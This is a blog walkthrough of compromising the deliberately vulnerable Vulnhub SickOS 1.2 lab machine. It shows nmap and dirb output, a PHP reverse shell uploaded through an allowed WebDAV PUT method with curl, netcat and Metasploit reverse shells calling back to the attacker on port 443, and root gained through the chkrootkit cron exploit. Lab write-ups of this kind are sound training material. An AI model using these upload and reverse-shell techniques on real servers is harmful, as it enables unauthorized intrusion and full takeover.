Vulnhub SickOS 1.2 Walkthrough

Hello Friend!, I know i was inactive on this blog for a while but now im planing to be active, anyways today I am going to show how I Pwned Vulnhub SickOS 1.2 machine and will give you a walkthrough for the same.

Description of SickOs 1.2 on Vulnhub:
This is second in following series from SickOs 1.2 and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.
Difficulty:beginner

Vulnhub SickOS 1.2 Walkthrough : Lets Get Started!!

First we need to find out the target machine's (SickOs 1.2) IP inorder to gather information about it.
Here i simply used nmap -sn option: Host Discovery option with my IP and scanned the whole subnet and I Got the IP address of my machine running on Virtualbox which is SickOs 1.2.

root@r00t3v1l:~# nmap -sn 192.168.0.25/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-20 22:54 IST
Nmap scan report for 192.168.0.1
Host is up (0.0036s latency).
MAC Address: 98:2F:3C:DE:AD:05 (Sichuan Changhong Electric)
Nmap scan report for 192.168.0.49
Host is up (0.00038s latency).
MAC Address: 08:00:27:90:16:5B (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.50
Host is up (0.12s latency).
MAC Address: 34:E6:AD:A3:E3:23 (Intel Corporate)
Nmap scan report for 192.168.0.25
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.32 seconds

Now that we have the IP address its time for nmap scan to detect open ports and the services running on them

Here I have used nmap :

• -sV option to scan for service versions
• -sC option to to use common nmap nse scripts
• -p- or -p 0-65535 option to scan all the ports

root@r00t3v1l:~# nmap -sV -sC 192.168.0.49 -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-20 22:54 IST
Nmap scan report for 192.168.0.49
Host is up (0.00044s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:90:16:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.59 seconds
root@r00t3v1l:~#

 So far we have found 2 ports open:

• 22 SSH
• 80 http

I opened port ip in the browser but found nothing useful


So I ran dirb to look for potential hidden directories on SickOs 1.2 vulnerable machine and found /test/ directory.

root@r00t3v1l:~# dirb http://192.168.0.49/
-----------------
DIRB v2.22   
By The Dark Raver
-----------------
START_TIME: Wed Jun 20 23:25:34 2018
URL_BASE: http://192.168.0.49/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                         

---- Scanning URL: http://192.168.0.49/ ----
+ http://192.168.0.49/index.php (CODE:200|SIZE:163)                           
==> DIRECTORY: http://192.168.0.49/test/                                      
                                                                              
---- Entering directory: http://192.168.0.49/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)                                                                
-----------------
END_TIME: Wed Jun 20 23:25:35 2018
DOWNLOADED: 4612 - FOUND: 1
root@r00t3v1l:~#

Checked the /test/ directory but found that it is running lighttpd 1.4.28 server. Quickly check for its available exploits but got nothing working.


On looking for the available HTTP methods on this /test/ directory using curl found that the PUT method is allowed, which we can use to upload files on this directory.

root@r00t3v1l:~# curl -vv -X OPTIONS http://192.168.0.49/test/
*   Trying 192.168.0.49...
* TCP_NODELAY set
* Connected to 192.168.0.49 (192.168.0.49) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.0.49
> User-Agent: curl/7.60.0
> Accept: */*
>
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Wed, 20 Jun 2018 18:09:47 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.0.49 left intact
root@r00t3v1l:~#

I uploaded a php reverse shell using PUT HTTP method vulnerability on the /test/ directory using curl and got a lovely message "We are completely uploaded and fine"

root@r00t3v1l:~#curl -v --upload-file /root/shell.php http://192.168.0.49/test/r00t.php -0
*   Trying 192.168.0.49...
* TCP_NODELAY set
* Connected to 192.168.0.49 (192.168.0.49) port 80 (#0)
> PUT /test/r00t.php HTTP/1.0
> Host: 192.168.0.49
> User-Agent: curl/7.60.0
> Accept: */*
> Content-Length: 5494
>
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 20 Jun 2018 18:15:13 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
root@r00t3v1l:~#

Now simply setup a netcat nc listener and make a http request to your uploaded reverse shell through your browser. and WOAH!!! you have a limited shell on the server.

Now one thing here i have noticed that reverse shell is blocked on strange ports like 4444 or 1337 maybe due to rules set on iptables probably. It worked when i used port 443 for the same purpose.

python -c 'import pty; pty.spawn("/bin/bash")'

After enumerating the SickOs 1.2 vulnhub machine for some time I found that a vulnerable cronjob is running with name chkrootkit whose metasploit exploit is available...

exploit/unix/local/chkrootkit

but for this we need a reverse shell session on metasploit so we will use
Unfortunately interpreter is not working here.

msf exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(multi/handler) > run

[*]Started reverse TCP handler on 192.168.0.25:443
[*] Command shell session 2 opened (192.168.0.25:443 -> 192.168.0.105:43170) at 2018-06-21 00:28:34 +0530

Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 11:58:33 up 34 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ^Z
Background session 2? [y/N]  y
msf exploit(multi/handler) >

Background the session using CTRL +Z
Now Simply run the chkrootkit exploit and set your reverse shell session ID to it and hit EXPLOIT!! :D

msf exploit(multi/handler) > use exploit/unix/local/chkrootkit
msf exploit(unix/local/chkrootkit) > show options

Module options (exploit/unix/local/chkrootkit):

   Name        Current Setting       Required  Description
   ----        ---------------       --------  -----------
   CHKROOTKIT  /usr/sbin/chkrootkit  yes       Path to chkrootkit
   SESSION                           yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(unix/local/chkrootkit) > set SESSION 2
SESSION => 2
msf exploit(unix/local/chkrootkit) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP double handler on 192.168.0.25:4444
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...

Now we have to wait for chrootkit to run. Here the thing the chrootkit cronjob runs once a day so you have to wait for it to run and after that you will get a root shell.

SO this was Vulnhub SickOS 1.2 Walkthrough, hope if enjoyed reading it. please do leave your valuable comments below if it helped you :)